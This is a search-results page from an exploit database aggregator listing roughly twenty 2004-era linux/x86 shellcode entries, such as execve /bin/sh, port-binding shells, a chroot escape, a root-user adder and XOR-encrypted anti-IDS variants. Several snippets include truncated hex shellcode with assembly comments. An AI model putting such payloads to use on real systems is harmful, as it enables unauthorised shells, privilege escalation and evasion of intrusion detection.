Lucene search
+L

577 matches found

0day.today
0day.today
added 2004/09/26 12:0 a.m.21 views

linux/x86 symlink /bin/sh xoring 56 bytes

Exploit for linux/x86 platform in category shellcode ========================================= linux/x86 symlink /bin/sh xoring 56 bytes ========================================= /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version with anti IDS...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.23 views

linux/x86 execve /bin/sh 24 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 24 bytes ================================= / email protected execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.33 views

linux/x86 portbind port 5074 + fork() 130 bytes

Exploit for linux/x86 platform in category shellcode =============================================== linux/x86 portbind port 5074 + fork 130 bytes =============================================== / email protected 0x9abril0x7d2 syssocketcall 102 0x66 %eax, esta es nuestra rutina principal. En toda...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.17 views

linux/x86 portbind port 5074 92 bytes

Exploit for linux/x86 platform in category shellcode ===================================== linux/x86 portbind port 5074 92 bytes ===================================== / email protected x86 portbind a shell in port 5074 92 bytes. / char shellcode = "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.27 views

linux/x86 execve /bin/sh 24 bytes

linux/x86 execve /bin/sh 24 bytes. Shellcode exploit for linx86 platform / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" ...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.67 views

linux/x86 execve /bin/sh 29 bytes

linux/x86 execve /bin/sh 29 bytes. Shellcode exploit for linx86 platform / c1999-2003 Shellcode Research http://www.shellcode.com.ar execve/bin/sh for linux x86 29 bytes by Matias Sedalo xorl %ebx, %ebx pushl %ebx leal 0x17%ebx,%eax int $0x80 cdq pushl $0x68732f6e pushl $0x69622f2f movl %esp, %eb...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.14 views

linux/x86 execve /bin/sh 30 bytes

No description provided by source. / [email protected] 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" // xorl %edx,%edx "\x52" // pushl %edx "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // push...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.11 views

linux/x86 execve /bin/sh encrypted 58 bytes

No description provided by source. / !!!!!! PRIVATE !!!!!!! // ANTI-IDS SHELLCODE // // !!!!!!!!!!!!!!!!!! // [email protected] 0x1d abril 0x7d2 ./test.c !!! Shellcode execve sh Encriptada !!! AHORA EN 58 BYTES !!!!!!!!!!!!!! Notese que la encripcion se ha hecho a toda la shellcode y no...

7.1AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.26 views

linux/x86 execve /bin/sh 38 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 38 bytes ================================= / email protected execve /bin/sh main char name2; name0="/bin/sh"; name1=NULL; execvename0,name,NULL; / include char shellcode= "\xeb\x18" //...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.31 views

linux/x86 bsd/x86 execve /bin/sh 38 bytes

linux/x86 bsd/x86 execve /bin/sh 38 bytes. Shellcode exploits for multiple platform / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x54" "\x53" "\x50" "\x8c\xe0" "\x21\xc0" "\x74\x04"...

Exploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.35 views

linux/x86 execve /bin/sh 30 bytes

linux/x86 execve /bin/sh 30 bytes. Shellcode exploit for linx86 platform / [email protected] 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" // xorl %edx,%edx "\x52" // pushl %edx "\x68\x6e\x2f\x73\x68" // pushl...

0.1AI score
Exploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.16 views

linux/x86 execve /bin/sh 38 bytes

No description provided by source. / [email protected] execve /bin/sh main char name2; name0="/bin/sh"; name1=NULL; execvename0,name,NULL; / include stdio.h char shellcode= "\xeb\x18" // jmp 0x18 // 3-4 "\x5e" // popl %esi // 5 "\x89\x76\x08" // movl %esi, 0x8%esi // 6-8 "\x31\xc0" // xor...

7.1AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.14 views

linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes

Exploit for multiple platform in category shellcode ================================================================ linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes ================================================================ / Shellcode ejecuta execve /bin/sh en Irix/mips,...

7.1AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.15 views

linux/x86 break chroot 34 bytes

Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 34 bytes =============================== / The setuid0+chroot shellcode. It is the one of the smallest shellcodes in the !!world!! it will put '../' 10 times Size 34 bytes OS BSD...

7AI score
Exploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.17 views

linux/x86 execve /bin/sh xor encrypted 55 bytes

No description provided by source. / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl %ebx,0x8%esp movl %edx,0xc%esp movb $0xb,%al leal 0x8%esp,%e...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.23 views

linux/x86 add user 104 bytes

linux/x86 add user 104 bytes. Shellcode exploit for linx86 platform / Source to this is pass.s This will append a root line to the passwd file see the source. Shok Matt Conover, [email protected] / char shellcode= "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"...

7.4AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.22 views

linux/x86 execve /bin/sh tolower() evasion 41 bytes

Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 execve /bin/sh tolower evasion 41 bytes =================================================== / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include char...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.22 views

linux/x86 execve /bin/sh 30 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 30 bytes ================================= / email protected 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" //...

7AI score
Exploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.11 views

linux/x86 execve /bin/sh setreuid(12 12) 50 bytes

No description provided by source. / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include stdio.h char c0de = / main: / / setregid12, 12; / "\x29\xc0" / subl %eax, %eax / "\xb0\x47" / movb $71, %al / "\x29\xdb" / subl %ebx, %ebx / / Here's...

7.1AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.33 views

linux/x86 execve /bin/sh encrypted 58 bytes

Exploit for linux/x86 platform in category shellcode =========================================== linux/x86 execve /bin/sh encrypted 58 bytes =========================================== / !!!!!! PRIVATE !!!!!!! // ANTI-IDS SHELLCODE // // !!!!!!!!!!!!!!!!!! // email protected 0x1d abril 0x7d2...

7AI score
Exploits0
Rows per page
Query Builder